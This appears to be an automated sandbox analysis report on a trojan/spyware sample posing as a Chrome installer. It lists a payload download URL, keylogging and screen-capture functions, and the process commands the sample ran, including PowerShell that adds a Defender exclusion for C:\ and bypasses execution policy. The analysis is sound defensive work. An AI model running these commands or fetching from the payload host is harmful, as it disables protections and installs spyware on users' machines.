                      Source: FIWszl1A8l.exe, FIWszl1A8l.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                      Source: FIWszl1A8l.exe, FIWszl1A8l.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: FIWszl1A8l.exe, FIWszl1A8l.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: powershell.exe, 00000013.00000002.1679857950.0000000007090000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoftM
                      Source: powershell.exe, 00000013.00000002.1679857950.0000000007090000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoftMicrosoft.PowerShell.Archive.psd1
                      Source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: http://html4/loose.dtd
                      Source: powershell.exe, 00000004.00000002.1356459970.000000000563C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403002958.000000000597C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1437685680.000000000568D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1674897205.00000000059A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: FIWszl1A8l.exe, FIWszl1A8l.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
                      Source: FIWszl1A8l.exe, FIWszl1A8l.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
                      Source: powershell.exe, 00000013.00000002.1657270156.0000000004A95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000004.00000002.1352573033.0000000004726000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1392284499.0000000004A65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1392284499.0000000004F10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1420200807.0000000004776000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1657270156.0000000004F27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1657270156.0000000004A95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000004.00000002.1352573033.00000000045D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1392284499.0000000004911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1420200807.0000000004621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1657270156.0000000004941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1648793424.0000000004314000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000004.00000002.1352573033.0000000004726000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1392284499.0000000004A65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1392284499.0000000004F10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1420200807.0000000004776000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1657270156.0000000004F27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1657270156.0000000004A95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: http://support.google.com/installer/
                      Source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: http://support.google.com/installer/%s?product=%s&error=%d
                      Source: powershell.exe, 00000013.00000002.1657270156.0000000004A95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: powershell.exe, 00000004.00000002.1352573033.00000000045D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1392284499.0000000004911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1420200807.0000000004621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1657270156.0000000004941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1648793424.00000000042E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1648793424.00000000042D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: powershell.exe, 0000000D.00000002.1420200807.0000000004776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                      Source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: https://clients2.google.com/cr/report
                      Source: powershell.exe, 00000013.00000002.1674897205.00000000059A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000013.00000002.1674897205.00000000059A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000013.00000002.1674897205.00000000059A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: https://crashpad.chromium.org/
                      Source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: https://crashpad.chromium.org/bug/new
                      Source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new
                      Source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: https://dl.google.com/update2/installers/icons/
                      Source: powershell.exe, 00000013.00000002.1657270156.0000000004A95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 0000000A.00000002.1392284499.0000000005223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1392284499.00000000050E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1392284499.0000000005043000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1657270156.000000000529C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1657270156.00000000050AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.0000000000A37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/
                      Source: FIWszl1A8l.exe, 00000000.00000002.1733549157.0000000000400000.00000040.00000001.01000000.00000003.sdmp, FIWszl1A8l.exe, 00000000.00000002.1734717265.00000000009D9000.00000004.00000020.00020000.00000000.sdmp, FIWszl1A8l.exe, 00000000.00000002.1734717265.0000000000A37000.00000004.00000020.00020000.00000000.sdmp, FIWszl1A8l.exe, 00000006.00000002.3781678272.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exe
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.00000000009D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exe3E(
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.00000000009D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exeZ
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.00000000009D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exeg
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.00000000009D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exetB
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.00000000009D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exexC
                      Source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: https://m.google.com/devicemanagement/data/api
                      Source: powershell.exe, 00000004.00000002.1356459970.000000000563C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403002958.000000000597C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1437685680.000000000568D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1674897205.00000000059A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: FIWszl1A8l.exe, FIWszl1A8l.exe.0.drString found in binary or memory: https://sectigo.com/CPS0
                      Source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: https://update.googleapis.com/service/update2/json
                      Source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: https://update.googleapis.com/service/update2/jsonhttps://clients2.google.com/cr/reporthttps://m.goo
                      Source: FIWszl1A8l.exe, FIWszl1A8l.exe.0.drString found in binary or memory: https://www.innosetup.com/
                      Source: FIWszl1A8l.exe, FIWszl1A8l.exe.0.drString found in binary or memory: https://www.remobjects.com/ps
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                      Source: unknownHTTPS traffic detected: 47.79.66.76:443 -> 192.168.2.9:49751 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to capture and log keystrokes
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: [esc]6_2_02D0E850
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: [esc]6_2_02D0E850
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: [esc]6_2_02D0E850
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: [esc]6_2_02D0E850
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D0E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,6_2_02D0E850
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D0E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,6_2_02D0E850
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D0BC70 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC,6_2_02D0BC70
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D0E4F0 Sleep,CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState,6_2_02D0E4F0
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeCode function: 0_2_008D18A7 GetModuleHandleA,CreateWindowExW,SendMessageW,CreateThread,PostQuitMessage,NtdllDefWindowProc_W,0_2_008D18A7
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D0B463 ExitWindowsEx,6_2_02D0B463
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D0B41B ExitWindowsEx,6_2_02D0B41B
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D0B43F ExitWindowsEx,6_2_02D0B43F
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeCode function: 0_2_100167210_2_10016721
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeCode function: 0_2_008D00320_2_008D0032
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeCode function: 0_2_008E66F80_2_008E66F8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_044BB4904_2_044BB490
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_044BB4704_2_044BB470
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08493A984_2_08493A98
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_3_03FACBBB6_3_03FACBBB
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_3_03FC1B5A6_3_03FC1B5A
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_3_03FAB19B6_3_03FAB19B
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_3_03FC20AB6_3_03FC20AB
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_3_03FA676B6_3_03FA676B
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_3_03FAAF0B6_3_03FAAF0B
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_3_03FBC63C6_3_03FBC63C
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_3_03FC25FC6_3_03FC25FC
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_3_03FC3CBA6_3_03FC3CBA
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D06EE06_2_02D06EE0
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D06C506_2_02D06C50
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D1EA1D6_2_02D1EA1D
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D183816_2_02D18381
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D1E3416_2_02D1E341
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D1D89F6_2_02D1D89F
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D1F9FF6_2_02D1F9FF
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D089006_2_02D08900
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D024B06_2_02D024B0
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D1DDF06_2_02D1DDF0
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_0098122F6_2_0098122F
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_009724B06_2_009724B0
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_00980CDE6_2_00980CDE
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_00982D916_2_00982D91
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_00981E5C6_2_00981E5C
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_0097B66A6_2_0097B66A
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_009817806_2_00981780
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_009200326_2_00920032
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_009312066_2_00931206
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_009224876_2_00922487
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_00930CB56_2_00930CB5
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_00932D686_2_00932D68
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_0092B6416_2_0092B641
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_009317576_2_00931757
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_028282BF6_2_028282BF
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_0283D25E6_2_0283D25E
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_0283F3BE6_2_0283F3BE
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_0282689F6_2_0282689F
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_0282660F6_2_0282660F
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02821E6F6_2_02821E6F
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_0283D7AF6_2_0283D7AF
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_0283DD006_2_0283DD00
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02837D406_2_02837D40
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: String function: 02833CBF appears 33 times
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: String function: 02D14300 appears 32 times
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: String function: 03FB85BB appears 33 times
                      Source: FIWszl1A8l.exeStatic PE information: invalid certificate
                      Source: FIWszl1A8l.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                      Source: FIWszl1A8l.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                      Source: ChromeSetup[1].exe.0.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.4
                      Source: ChromeSetup[1].exe.0.drStatic PE information: Resource name: RT_STRING type: CLIPPER COFF executable (VAX #) not stripped - version 71
                      Source: ChromeSetup.exe.0.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.4
                      Source: ChromeSetup.exe.0.drStatic PE information: Resource name: RT_STRING type: CLIPPER COFF executable (VAX #) not stripped - version 71
                      Source: FIWszl1A8l.exe, 00000000.00000000.1315475964.00000000006F4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs FIWszl1A8l.exe
                      Source: FIWszl1A8l.exe, 00000000.00000003.1366103357.00000000029D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs FIWszl1A8l.exe
                      Source: FIWszl1A8l.exe, 00000000.00000002.1737241689.0000000000D78000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs FIWszl1A8l.exe
                      Source: FIWszl1A8l.exe, 00000006.00000002.3785160100.0000000000C98000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs FIWszl1A8l.exe
                      Source: FIWszl1A8l.exeBinary or memory string: OriginalFileName vs FIWszl1A8l.exe
                      Source: FIWszl1A8l.exe.0.drBinary or memory string: OriginalFileName vs FIWszl1A8l.exe
                      Source: FIWszl1A8l.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@29/27@1/2
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D07B70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,6_2_02D07B70
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D07620 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,6_2_02D07620
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D07740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,6_2_02D07740
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D06C50 wsprintfW,MultiByteToWideChar,GetDriveTypeW,GetDiskFreeSpaceExW,_memset,GlobalMemoryStatusEx,swprintf,swprintf,6_2_02D06C50
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeCode function: 0_2_10001FA0 CreateToolhelp32Snapshot,memset,Process32FirstW,WideCharToMultiByte,CloseHandle,Process32NextW,CloseHandle,0_2_10001FA0
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeCode function: 0_2_10002090 InternetOpenA,InternetOpenUrlA,fopen,HttpQueryInfoW,SendMessageW,InternetReadFile,fwrite,SendMessageW,fclose,InternetCloseHandle,InternetCloseHandle,GetParent,ShowWindow,WaitForSingleObject,CoInitializeEx,CoCreateInstance,Sleep,Sleep,exit,0_2_10002090
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeFile created: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8084:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeMutant created: \Sessions\1\BaseNamedObjects\2024.12.28
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2368:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:344:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeMutant created: \Sessions\1\BaseNamedObjects\VJANCAVESU
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeFile created: C:\Users\user\AppData\Local\Temp\PolicyManagement.xmlJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: FIWszl1A8l.exeVirustotal: Detection: 45%
                      Source: FIWszl1A8l.exeReversingLabs: Detection: 31%
                      Source: FIWszl1A8l.exeString found in binary or memory: -Helper process exited with failure code: 0x%x
                      Source: FIWszl1A8l.exeString found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
                      Source: FIWszl1A8l.exeString found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
                      Source: FIWszl1A8l.exeString found in binary or memory: /LoadInf=
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeFile read: C:\Users\user\Desktop\FIWszl1A8l.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\FIWszl1A8l.exe "C:\Users\user\Desktop\FIWszl1A8l.exe"
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeProcess created: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe "C:\Users\user\AppData\Roaming\FIWszl1A8l.exe"
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
